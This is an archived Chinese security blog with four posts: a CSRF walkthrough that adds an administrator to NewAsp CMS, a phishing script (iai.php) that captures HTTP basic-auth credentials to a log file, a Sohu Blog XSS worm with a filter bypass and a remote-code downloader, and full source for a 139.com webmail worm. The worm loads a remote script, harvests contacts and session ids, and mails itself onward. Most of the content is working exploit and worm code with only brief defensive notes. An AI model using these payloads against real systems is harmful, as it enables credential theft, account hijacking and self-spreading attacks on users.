暖月 » csrf漏洞

浅析跨站请求伪造

Wed, 06 Jan 2010 17:40:37 +0000

跨站请求伪造(cross-site request forgery)通常缩写为XSRF，直译为跨站请求伪造，即攻击者通过调用第三方网站的恶意脚本或者利用程序来伪造请求，当然并不需要向用户端伪装任何具有欺骗的内容，在用户不知情时攻击者直接利用用户的浏览器向攻击的应用程序提交一个已经预测好请求参数的操作数据包，利用的实质是劫持用户的会话状态，强行提交攻击者构造的具有“操作行为”的数据包。可以看出，最关键的是劫持用户的会话状态，所以说，导致XSRF漏洞的主要原因是会话状态的保持没有唯一时间特征的标识，即是说在使用HTTPCookie传送会话令牌的过程中，应该更谨慎的判断当前用户，而不是简单的通过操作数据包的Cookie值来鉴别，简单的说是每次数据交互时，对提交的数据包实行唯一性标识。
XSRF攻击流程大致如下：

从上图可以看出，要完成一次XSRF攻击，比较关键的三个问题：
1) 会话状态[A]的保持，即用户已经获取了易受攻击网站A的信任授权。
2) 用户在依然保持没有登出易受攻击网站A的情况下，访问了“第三方网站”。
3) 提交的“操作”数据包是可以预知的。

国内的许多大型WEB程序开发者好像对XSRF没有足够的重视，这些看似需要特定场景才能诱发的漏洞，在结合XSS后，想来威胁应该不在注入之下。本文以新云管理系统来实例演示添加管理员。
在网上下载的版本是”NewAsp CMS Version 4.0.0 SP2”。在新云管理系统添加管理员的构造表单如下，代码在“/wwwroot/admin/users/admin_master.asp”

<form action="?action=savenew" accept-charset="UNKNOWN" enctype="application/x-www-form-urlencoded" method="post">
<table class="tableborder" border="0" cellspacing="1" cellpadding="3" align="center">
<tbody>
<tr>
<th colspan="2">添加管理员th>
tr>
<tr>
<td class="tablerow1" width="25%" align="right"><strong>后台登陆名称：strong>td>
<td class="tablerow1" width="75%"><input name="username2" size="30" type="text" />td>
tr>
<tr>
<td class="tablerow2" align="right"><strong>后台登陆密码：strong>td>
<td class="tablerow2"><input name="password2" size="30" type="password" />td>
tr>
<tr>
<td class="tablerow1" align="right"><strong>管理员级别：strong>td>
<td class="tablerow1"><input checked="checked" name="AdminGrade" type="radio" value="0" /> 普通管理员   <input name="AdminGrade" type="radio" value="999" /> 高级管理员（拥有最高权限）   <input name="AdminGrade" type="radio" value="111" /> 只读管理员td>
tr>
<tr>
<td class="tablerow2" align="right"><strong>限制一个管理员登陆：strong>td>
<td class="tablerow2"><input checked="checked" name="isAloneLogin" type="radio" value="1" /> 是   <input name="isAloneLogin" type="radio" value="0" /> 否td>
tr>
<tr>
<td class="tablerow1" align="right"><strong>是否激活管理员：strong>td>
<td class="tablerow1"><input checked="checked" name="isLock" type="radio" value="0" /> 是   <input name="isLock" type="radio" value="1" /> 否td>
tr>
<tr>
<td class="tablerow2" align="right"><strong> strong>td>
<td class="tablerow2"><input class="button" name="reset_button" type="reset" value="清 除" />   <input class="button" name="submit_button" type="submit" value="提 交" />td>
tr>
tbody>
table>
form>

从代码可以看出构造的提交表单没有再次验证，而是让cookie来简单判定用户操作行为，即使cookie的滥用，导致xsrf漏洞的出现。
以下代码是新云管理系统添加管理员的代码：

Sub savenew()
Dim Rs,SQL
Dim adminuserid
If Request.Form("username2") = "" Then
ErrMsg = "请输入后台登陆用户名！"
Founderr = True
Exit Sub
Else
adminuserid = Request.Form("username2")
End If
If Request.Form("password2") = "" Then
ErrMsg = "请输入后台登陆密码！"
Founderr = True
Exit Sub
End If
Set Rs=NewAsp.Execute("SELECT username FROM NC_Admin WHERE username='" &amp; Replace(Request.Form("username2"), "'", "") &amp; "'")
If Not (Rs.EOF And Rs.bof) Then
ErrMsg = "您输入的用户名已经在管理用户中存在！"
Founderr = True
Exit Sub
End If
Set Rs=NewAsp.CreateAXObject("ADODB.Recordset")
SQL="SELECT * FROM NC_Admin WHERE (id is null)"
Rs.open SQL,conn,1,3
Rs.addnew
Rs("username") = Replace(Request.Form("username2"), "'", "")
If NewAsp.ChkNumeric(Request.Form("AdminGrade")) = 999 Then
Rs("status") = "高级管理员"
ElseIf NewAsp.ChkNumeric(Request.Form("AdminGrade")) = 111 Then
Rs("status") = "只读管理员"
Else
Rs("status") = "普通管理员"
End If
Rs("password") = md5(Request.Form("password2"),16)
Rs("isLock") = NewAsp.ChkNumeric(Request.Form("isLock"))
Rs("AdminGrade") = NewAsp.ChkNumeric(Request.Form("AdminGrade"))
Rs("Adminflag") = ",,,,,,,,,,,,,,,"
Rs("LoginTime") = Now()
Rs("Loginip") = NewAsp.UserTrueIP
Rs("RandomCode") = NewAsp.GetRandomCode(16)
Rs("isAloneLogin") = NewAsp.ChkNumeric(Request.Form("isAloneLogin"))
Rs.update
Rs.close:set Rs=Nothing
Succeed ("用户ID:" &amp; adminuserid &amp; " 添加成功，请到管理员管理给予相应的权限，如需修改请返回管理员管理！")
End Sub

对添加管理员操作进行抓包分析，如图:

只是向/admin/users/admin_master.asp?action=savenew 页面POST一行数据“
username2=fan&password2=fan&AdminGrade=999&isAloneLogin=1&isLock=0&submit_button=%CC%E1+%BD%BB“，这就是添加网站管理员的一个数据操作。我们来模拟提交一下，在Firefox浏览器安装插件Hackbar，如图：

点选”Enble Post data”空框按钮，填写Post的地址和数据，来添加一个用户名和密码均为nuanyue，如图：

由于xsrf攻击需要劫持网站的授权，所以之前是需要登录后台的，点击“Execute”进行提交，如图：

提示添加用户nuanyue成功，刚模拟了数据提交的过程，只要劫持了cookie就能直接添加管理员了。通过模拟提交数据，可以肯定新云网站管理系统存在XSRF漏洞。
在分析了数据提交的过程，需要构造一个在后台自动提交的文件，lake2在其csrf攻击与防御的文章中，提供了一个Asp提交的代码：

Post.asp
--r /> response.write("XSS post forwarder")
lake2 = antiXSS(request("lake2"))
if lake2<>"" then
response.write("
")
for each b in request.QueryString
if b <> "lake2" then response.write("")
next
response.write("
 
"
)
response.write("/javascript">< !  document.forms[0].submit(); //  >")
else
response.Write("enjoy hacking :p")
end if
 
' -_-!!
function antiXSS(str)
str = replace(str, "'", "")
antiXSS = str
end function
-->

在调用时用到iframe框架调用代码2.html如下：

在构造好用于数据提交的文件后，剩下就是诱使网站管理员来访问网页了。当然如果有xss漏洞，则可以用Javascript直接调用。如图：

当网站管理员点击时，我们对此抓包分析看跟在网站管理后台提交的数据包是否一样：

与模拟提交的过程一样，成功添加网站管理员：

看来XSRF攻击还是挺简单的。只是看你如何利用了。从攻击过程来看，攻击者劫持登录到网站的受信任者的cookie而构造了一个后台提交Post数据的网页，当受信任者访问了此构造的网页就会在后台隐藏提交添加管理员的数据包，从而利用了受信cookie值进行操作。在防范此类攻击时，一般的解决方案是页面使用验证码，这是最直接和简单的，在验证码算法没有被攻破前，是最有效的。当然还有一些不太完善的方法，比如检查HTTP请求来路，检查COOKIE凭据，隐藏表单等。在检测访问来路的方案中，获得HTTP请求中的来路信息，攻击者是可以伪造HTTP Referer进行欺骗，在检查COOKIE凭据时，攻击者可以通过XSS轻易获取其值，而隐藏表单则只需要分析提交的数据，即可模拟提交，当然上述方法如果结合别的技术也是可行的
分享以前写的Post数据JS版:

<script language="javascript"> 
var bXmlHttpSupport = (typeof XMLHttpRequest == "object" || window.ActiveXObject);
 
function httpPost(sURL, sParams) {
 
    var oURL = new java.net.URL(sURL);
    var oConnection = oURL.openConnection();
 
    oConnection.setDoInput(true);
    oConnection.setDoOutput(true);
    oConnection.setUseCaches(false);                
    oConnection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");                
 
    var oOutput = new java.io.DataOutputStream(oConnection.getOutputStream());
    oOutput.writeBytes(sParams);
    oOutput.flush();
    oOutput.close();
 
    var sLine = "", sResponseText = "";
 
    var oInput = new java.io.DataInputStream(oConnection.getInputStream());                                
    sLine = oInput.readLine();
 
    while (sLine != null){                                
        sResponseText += sLine + "\n";
        sLine = oInput.readLine();
    }
 
    oInput.close();                                  
 
    return sResponseText;                         
}
 
function addPostParam(sParams, sParamName, sParamValue) {
    if (sParams.length > 0) {
        sParams += "&";
    }
    return sParams + encodeURIComponent(sParamName) + "=" 
                   + encodeURIComponent(sParamValue);
}
 
function addURLParam(sURL, sParamName, sParamValue) {
    sURL += (sURL.indexOf("?") == -1 ? "?" : "&");
    sURL += encodeURIComponent(sParamName) + "=" + encodeURIComponent(sParamValue);
    return sURL;   
}
 
 
if (typeof XMLHttpRequest == "undefined" && window.ActiveXObject) {
 
    function XMLHttpRequest() {
 
        var arrSignatures = ["MSXML2.XMLHTTP.5.0", "MSXML2.XMLHTTP.4.0",
                             "MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP",
                             "Microsoft.XMLHTTP"];
 
        for (var i=0; i < arrSignatures.length; i++) {
            try {
 
                var oRequest = new ActiveXObject(arrSignatures[i]);
 
                return oRequest;
 
            } catch (oError) {
                //ignore
            }
        }          
 
        throw new Error("MSXML is not installed on your system.");               
    }
}
 
 
var Http = new Object;
 
 
 
Http.post = function (sURL, sParams, fnCallback) {
 
    if (bXmlHttpSupport) {
 
        var oRequest = new XMLHttpRequest();
        oRequest.open("post", sURL, true);
        oRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        oRequest.onreadystatechange = function () {
            if (oRequest.readyState == 4) {
                fnCallback(oRequest.responseText);
            }
        }
        oRequest.send(sParams);    
 
    } else if (navigator.javaEnabled() && typeof java != "undefined" 
            && typeof java.net != "undefined") {
 
        setTimeout(function () {
            fnCallback(httpPost(sURL, sParams));
        }, 10);
    } else {
        alert("Your browser doesn't support HTTP requests.");
    }          
 
};  
 
  function getServerInfo(data) {
                    var sURL = "http://www.nuanyuecom/te.php";
                    var sParams = "";
                    sParams = addPostParam(sParams, "name", data);
                    sParams = addPostParam(sParams, "book", "Professional JavaScript");
 
                    Http.post(sURL, sParams, function (sData) {
                        alert("Data from server: " + sData);
                    });
 
                }
 
 
 var h = location.hash; 
var a = h.split("#"); 
var b = unescape(a[ a.length-1]); 
getServerInfo(b);

图片引发验证的社工利用

Sun, 29 Nov 2009 06:52:53 +0000

文/饭

在这充满诱惑的网络，恶意攻击者的攻击手法层出不穷。而其中颇具难度的社会工程攻击在取得用户的信任的手段方面，往往更倾向于伪装用户服务提供商，或者是在用户交互时，直接进行欺骗。比较典型的网络钓鱼攻击是将用户引诱到一个通过精心设计与用户信任非常相似的钓鱼网站，让用户在不易察觉的情况下提供用户的个人敏感信息。在2004年，国内也曾出现过假冒银行的网站，比如假冒中国工商银行的网站。而这一篇文章，将主要介绍HTML语言里的图片标签引用而诱引的验证漏洞和其伪装的过程。
在milw0rm.com网站，petros发布一篇题为《Image Authentication Injection Paper + PoC》的文章，里头提到通过创建一个php文件向客户端的浏览器发送401未经授权的状态而导致浏览器显示一个登录对话框（显示给用户好像是从目标网站）发起的一个授权认证对话框，而恶意攻击者会诱使用户输入帐户或者密码之类的敏感信息从而导致钓鱼式的攻击。其流程如下：

HTTP是一种基于请求与响应模式的、无状态的、应用层的协议，客户端向服务器发送一个请求，请求头包含请求的方法、URL、协议版本、以及包含请求修饰符、客户信息和内容的类似于MIME的消息结构。服务器以一个状态行作为响应，相应的内容包括消息协议的版本，成功或者错误编码加上包含服务器信息、实体元信息以及可能实体内容。对整个过程进行抓包:
HTTP请求：

GET /iai.php HTTP/1.1 表示请求方法GET，请求的地址，和HTTP协议版本
Accept: */*           表示客户端可识别的内容类型列表，*/*表示所有类型
Accept-Language: zh-cn 表示客户端所能解盘的语言：简体中文
Accept-Encoding: gzip, deflate 表示客户端可以解盘的类型
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)              表示客户端浏览器型号
Host: www.test.cn 表示提交请求的页面
Connection: Keep-Alive      表示TCP连接保持打开

HTTP响应：

HTTP/1.1 401 Unauthorized  表示HTTP协议版本，应答码是401 即未经授权访问
Date: Sat, 25 Jul 2009 11:42:27 GMT  表示当前的GMT时间
Server: Apache/2.2.3 (CentOS)  表示服务器的操作类型
X-Powered-By: PHP/5.1.6        表示服务器的脚本版本
WWW-Authenticate: Basic realm="Text" 表示客户端在Authenticate头中提供的授权信息
Content-Length: 3  表示连接内容长度
Connection: close  表示TCP连接关闭
Content-Type: text/html 表示文档类型
负责响应的iai.php文件内容：
  header('WWW-Authenticate: Basic realm="Text"');
  header('HTTP/1.0 401 Unauthorized');
使用了PHP中的Header()函数，发送一个原始HTTP标头[Http Header]到客户端。

钓鱼式攻击的利用，从上面流程图里，可以知道大致步骤如下：
在网页里插入恶意代码
插入调用远程图片的代码，形如：

[img]http://B.com/iai.php[/img]

最好是高度宽度都为0，免得在网页里显示空白,代码如下：

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

编写iai.php脚本这个脚本的主要功能包括返回401应答和获取提交的敏感信息，并保存。代码如下：

&lt; ?php
    global  $username,$passwd,$host;
      if (!isset($_SERVER['PHP_AUTH_USER']))
    {
     header('WWW-Authenticate: Basic realm="test"');
     header('HTTP/1.0 401 Unauthorized');
     exit;
     }
       $username=$_SERVER['PHP_AUTH_USER'];
       $passwd=$_SERVER['PHP_AUTH_PW'];
       $host = $_SERVER['HTTP_HOST'];
       $myFile = "log.txt";
       $fh = fopen($myFile, 'a') or die("can't open file");
       fwrite($fh, "网址:\t$host\t\t");
       fwrite($fh, "usname:\t$username\t");
       fwrite($fh, "passwd:\t$passwd\r\n");
       fclose($fh);
?&gt;

当正常用户访问网站时，插在网页里的iai.php文件，即会强制弹出验证框，如图：

如果用户提交了帐户或者密码后，iai.php会在后台自动提交给远程的log.txt文件，产生内容如下：

通过加载脚本强制验证窗体的弹出，此社工在利用时，还是具有一定的局限性。在隐藏攻击意图时，有些不足，弹出的框，比较生硬，也可以语言措辞下进行修改，但是对一些安全意识缺失的网民来说，还是会有上当的可能。希望大家能当心，不要轻易输入敏感信息。

实现完整的XSS wrom流程

Fri, 06 Nov 2009 05:53:07 +0000

文/茄子宝
1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,\/前是真正的空格),在个人档案处看过滤了哪些.

'';:!--"=&#{()} \/

结果

”;:!–”=&#{()} // (&后是amp,论坛过滤了)

过滤了”javascript”,”&”和”\”这两个转义字符串,因此HTML转码和CSS样式转码已无效,只好从属性和事件入手.

2.测试一个XSS常用属性和两个事件,貌似没有过滤字符.

expression
onerror
onload

3.下面开始尝试构造语句.如下:

="Xss:expression(alert('xss'));" src="#" alt="" />
 
="#" alt="" />
 
="http://js.pp.sohu.com/ppp/blog/styles/images/welcome.jpg" alt="" />

构造完整标记,页面输出后又全部过滤.

4.”/”字符没有过滤因此可以构造/*xxxx*/注释符,expression属性可以配合注释符构造出语句:

="xss:ex/**/pre/**/ssion(alert('xss'))">>

5.由于expression属性比较特殊想当于一个死循环的EVAL函数,同时style标记里不能出现”;”字符,也就是不能构造多条连接在一起的javascript,因此构造出如下语句:

="xss:ex/**/pre/**/ssion(eval(xss));">
 
//设置一个COOKIE在10秒后失效,并在这条COOKIE语句中执行其他语句或函数.>

6.遗憾的是SOHU BLOG对于标记内不合适的内容都会过滤,因此我们无法eval标记内的某个变量,于是采用fromCharCode方法,将Unicode字符值专成字符串再用eval函数执行:

="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)))">>

7.感染流程考虑:

(1).BLOG页面的个人档案处是页面通用的,
(2)XSS内容写到个人档案处,所有浏览者都会触发XSS
(3)实现一段提交XSS内容到个人档案的代码.

8.个人档案处只能输入2048个字符,又采用了fromCharCode方法,因此出现XSS代码长度的限制,因此只能调用远程代码,于是写出了个XSS downloader.

主要代码:

function d(){
a=new ActiveXObject('Microsoft.XMLHTTP'); /*调用XMLHTTP控件
a.Open('get','http://s0n9.blog.sohu.com/31406970.html',false);/*发出一个GET提交请求
a.send();
b=a.responseText; /*将传回值赋给变量B
eval(unescape(b.substring(b.indexOf('--|')+3,b.indexOf('|--'))));
/*用indexOf计算 --|********|-- 的位置,用substring方法取出字符串,最后用unescape方法解码.
}d()
 
http://s0n9.blog.sohu.com/31406970.html页面代码:
alert%28%27xss%27%29%3B

/*利用escape将标点符号转码,由于responseText特性,某些字符会转换,如”&”字符会变成”&”(&后是amp,论坛过滤了)

PS:其他传染和详细的伪造提交的过程略去,各门户网站小心,过滤好XSS关键字,以防止XSS WROM爆发

一个邮箱蠕虫编写实例

Thu, 05 Nov 2009 10:59:52 +0000

文/woyigui
原理分析:
我们经常会用到的mail.139.com，由于对邮件正文过滤不严,导致存在xss漏洞。他们尽管实现了对style=”xss:expression”进行过滤,但是可以通过添加/* */绕过，如：。在添加/* */后，该脚本能够在IE浏览器执行。
同时,经过分析发现,mail.139.com中发送邮件的功能存在CSRF弱点;可以通过Ajax技术获取发送邮件所需要的mid值。另外邮箱的“通信录“中的联系人邮件可以直接通过javascript取出。
满足了编写csrf worm的3个条件,接下来的工作,就是通过编写javascript代码来实现了。

跨站代码:
该部分要实现的功能就是,触发浏览器去读取远端的js脚本,并且执行该脚本:

Original:
var ig =document.createElement("script");ig.src=" http://192.168.9.104/woyigui/139.js";try {document.getElementsByTagName("body")[0].appendChild(ig);} catch (e) {document.documentElement.appendChild(document.createElement("body"));document.getElementsByTagName("body")[0].appendChild(ig);}

对该部分编码按照10进制进行编码,以避免关键字被替换,并调用:

该部分代码,需放置在邮件正文中传送。

脚本功能的实现:

主要实现了如下功能:
1.通过脚本,读取联系人的邮箱地址。
该部分信息,可以通过top.LinkManList.concat()获取。
2.通过脚本，获取sid值
该部分信息,可以通过window.top.location.href,配合正则表达式获取到。
3.获取发送邮件所需要的mid值
在获取到sid值后,通过script打开”写邮件”页面,读取mid值。
4.发送邮件
发送邮件功能只验证mid值,因此在获取到正确的mid值后,连同获取到的联系人一起,构造post数据，发送邮件。
5.改写邮件转发规则和自动回复规则
在有正确的sid后,构造post。

完整代码：

var xssed = false;
if (typeof XSSflag != "undefined"){
  xssed = true;
}
var XSSflag = [
  {name: "version", url: "1.0"},
];
if ( xssed != true ) {  
  var xmlhttp;
  //create XHR
  function createXMLHttp(){  
      try {
        xmlhttp = new XMLHttpRequest();
      } catch (e) {
         var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0',
                     'MSXML2.XMLHTTP.4.0',
                     'MSXML2.XMLHTTP.3.0',
                     'MSXML2.XMLHTTP',
                     'Microsoft.XMLHTTP' );
        var success = false;
        for (var i=0;i < XMLHTTP_IDS.length && !success; i++) {
          try {
             xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
              success = true;
          } catch (e) {}
        }
        if (!success) {
          throw new Error('Unable to create XMLHttpRequest.');
        }
     }
  }
  function domid (dourl) {
    createXMLHttp();  
    var tmp = "";
    xmlhttp.open("GET", dourl, false);  
    xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
    xmlhttp.setRequestHeader("Connection", "close");
    xmlhttp.send(null);
    setTimeout( tmp = xmlhttp.responseText,500);
    return tmp;    
  }
  function startRequest(doUrl, tomail, subject, Content, account, mid, sid ){  
    createXMLHttp();  
    var params = "funcid=compose&sid="+ sid +"&mid="+ mid +"&hidRemoteIp=&ishtml=y&optype=send.x&idOpType=&text="+ Content +"&destcgi=&funcid=compose&netfdrhost=&to="+ tomail +"&cc=&bcc=&subject="+ subject +"&year=&month=&day=&hour=undefined&compinfo_minute=&chkHtmlMessage_text=y&chkHtmlMessage=y&ifsavetosent=y&account="+ account +"&destcgi=&netfdrhost=&split_rcpt=n&return_receipt=0&priority=0";
    xmlhttp.open("POST", doUrl, false);  
    xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
    xmlhttp.setRequestHeader("Content-length", params.length);
    xmlhttp.setRequestHeader("Connection", "close");
    xmlhttp.send(params);
  }
  function doMyAjax()  
  {  
     var strPer = '/coremail/cgi/attachfapps';
     var tomail = ';';
     var subject = "test20";
     var Content = "";
     var account = "";
     var sid = window.top.location.href.replace(/.*&sid=(.*)/,"$1");
     var tmpmid = domid("/coremail/fcg/ldmmapp?funcid=compose&sid=" + sid );  
     var mid="",text="";
     text=tmpmid.split("\n");
    for (var i=0;i < text.length; i++)
    {
      var patt=/name=\"mid\" value=\"/;
      if ( patt.test(text[i]))
      {  
        mid=text[i].replace(/.*name=\"mid\" value=\"(.*)\".*/, "$1");
        break;
      }
    }
    var mail_address=top.LinkManList.concat();
    for (var i=0,len=mail_address.length;i;";
      }
    }
     try {
       startRequest(strPer, encodeURIComponent(tomail), encodeURIComponent(subject), encodeURIComponent(Content), encodeURIComponent(account), mid, sid );    
     } catch (e) {
       alert("send data error!");
     }
  }
  doMyAjax();
}